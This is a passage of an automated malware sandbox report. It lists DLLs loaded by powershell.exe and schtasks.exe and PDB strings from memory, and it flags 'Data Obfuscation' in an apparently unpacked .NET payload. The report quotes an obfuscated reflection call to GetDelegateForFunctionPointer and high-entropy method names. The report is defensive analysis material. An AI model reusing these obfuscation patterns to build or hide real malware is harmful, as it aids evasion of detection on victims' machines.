                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: websocket.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: websocket.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: websocket.dll
                  Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                  Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                  Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                  Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                  Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                  Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                  Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                  Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                  Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                  Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                  Source: Google Drive.lnk.3.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                  Source: YouTube.lnk.3.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                  Source: Sheets.lnk.3.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                  Source: Gmail.lnk.3.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                  Source: Slides.lnk.3.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                  Source: Docs.lnk.3.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                  Source: Binary string: Adobe.pdb source: powershell.exe, 0000000B.00000002.2356511560.0000019FED130000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.2346293232.0000019FE4678000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2627405581.000002335422D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2614802027.000001CCBEA5D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2471509926.000001F3185BD000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: fystem.Core.pdb source: powershell.exe, 00000018.00000002.2504827631.000001F3208F8000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Windows\System.pdbpdbtem.pdb source: powershell.exe, 00000018.00000002.2508079419.000001F320BCC000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: ll\System.pdbv source: powershell.exe, 0000000B.00000002.2354518966.0000019FECEC3000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: .pdbpdblib.pdbidh){ source: powershell.exe, 00000017.00000002.2665844721.000001CCC70CF000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: scorlib.pdbT source: powershell.exe, 00000018.00000002.2508079419.000001F320BCC000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: .pdbg source: powershell.exe, 0000000B.00000002.2316263361.0000019FD2AC8000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \System.pdbpdbtem.pdb: source: powershell.exe, 0000000B.00000002.2354518966.0000019FECEC3000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.pdb source: powershell.exe, 0000000B.00000002.2354518966.0000019FECE45000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2665844721.000001CCC7054000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2508079419.000001F320BCC000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: ws\dll\mscorlib.pdb source: powershell.exe, 00000017.00000002.2665844721.000001CCC70CF000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: .pdblf source: powershell.exe, 00000017.00000002.2656642044.000001CCC6D9C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: Qib.pdb0 source: powershell.exe, 0000000B.00000002.2354518966.0000019FECEC3000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000016.00000002.2664465867.000002335C729000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2665844721.000001CCC7054000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2504827631.000001F3208F8000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: ws\dll\System.Core.pdbC source: powershell.exe, 0000000B.00000002.2352823018.0000019FECAC6000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: mscorlib.pdb source: powershell.exe, 00000017.00000002.2665844721.000001CCC7054000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbz source: powershell.exe, 00000017.00000002.2665844721.000001CCC7054000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: scorlib.pdbbx source: powershell.exe, 00000016.00000002.2664465867.000002335C76D000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: e.pdbB'2 source: powershell.exe, 0000000B.00000002.2354518966.0000019FECE08000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: orlib.pdbpdblib.pdbx source: powershell.exe, 0000000B.00000002.2354518966.0000019FECEC3000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000016.00000002.2664465867.000002335C729000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2504827631.000001F3208F8000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb4 source: powershell.exe, 00000016.00000002.2664465867.000002335C729000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 0000000B.00000002.2354518966.0000019FECE45000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2435524082.000001F3069F6000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb^ source: powershell.exe, 00000018.00000002.2508079419.000001F320BCC000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 0000000B.00000002.2354518966.0000019FECEA8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2669887405.000002335C78B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2496306256.000001F3208A2000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: .pdb+H source: powershell.exe, 00000018.00000002.2507406488.000001F32094E000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: Adobe.pdbx source: powershell.exe, 0000000B.00000002.2356511560.0000019FED130000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.2346293232.0000019FE4678000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2627405581.000002335422D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2614802027.000001CCBEA5D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2471509926.000001F3185BD000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: System.pdb} source: powershell.exe, 00000016.00000002.2664465867.000002335C76D000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: mscorlib.pdbpdblib.pdb source: powershell.exe, 00000016.00000002.2664465867.000002335C76D000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: $.pdbr3 source: powershell.exe, 0000000B.00000002.2352823018.0000019FECAED000.00000004.00000020.00020000.00000000.sdmp

                  Data Obfuscation

                  barindex
                  .NET source code contains method to dynamically call methods (often used by packers)
                  Source: 11.2.powershell.exe.19fe48e8dd8.4.raw.unpack, Yo82VwCRV3UT8r6biQk.cs.Net Code: Type.GetTypeFromHandle(YKZstLdMWqcuhh0SHwv.r8gxb8ODvG(16777286)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(YKZstLdMWqcuhh0SHwv.r8gxb8ODvG(16777255)),Type.GetTypeFromHandle(YKZstLdMWqcuhh0SHwv.r8gxb8ODvG(16777323))})
                  Source: 11.2.powershell.exe.19fed130000.6.raw.unpack, Yo82VwCRV3UT8r6biQk.cs.Net Code: Type.GetTypeFromHandle(YKZstLdMWqcuhh0SHwv.r8gxb8ODvG(16777286)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(YKZstLdMWqcuhh0SHwv.r8gxb8ODvG(16777255)),Type.GetTypeFromHandle(YKZstLdMWqcuhh0SHwv.r8gxb8ODvG(16777323))})
                  Source: 22.2.powershell.exe.233543815c0.4.raw.unpack, Yo82VwCRV3UT8r6biQk.cs.Net Code: Type.GetTypeFromHandle(YKZstLdMWqcuhh0SHwv.r8gxb8ODvG(16777286)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(YKZstLdMWqcuhh0SHwv.r8gxb8ODvG(16777255)),Type.GetTypeFromHandle(YKZstLdMWqcuhh0SHwv.r8gxb8ODvG(16777323))})
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FF848A5ED90 push es; iretd 11_2_00007FF848A6F12A
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FF848A57918 push ebx; retf 11_2_00007FF848A5796A
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FF848A5194A push ebp; iretd 11_2_00007FF848A5194C
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FF848A5776A pushad ; iretd 11_2_00007FF848A5785D
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FF848A5785E push eax; iretd 11_2_00007FF848A5786D
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FF848A5203B push ebp; iretd 11_2_00007FF848A5203C
                  Source: 11.2.powershell.exe.19fe48e8dd8.4.raw.unpack, YKZstLdMWqcuhh0SHwv.csHigh entropy of concatenated method names: 'r8gxb8ODvG', 'gL9xoZHim2', 'WtqRQLDj4GGwE9eHS3L', 'jZdqI4DWYeyueB7Yg0x', 'R0rdEsDOKickIwTArjx', 'mrpBPADUVUJq2n6yjNB', 'mHs9dwD4hwwnbLbXr6o'
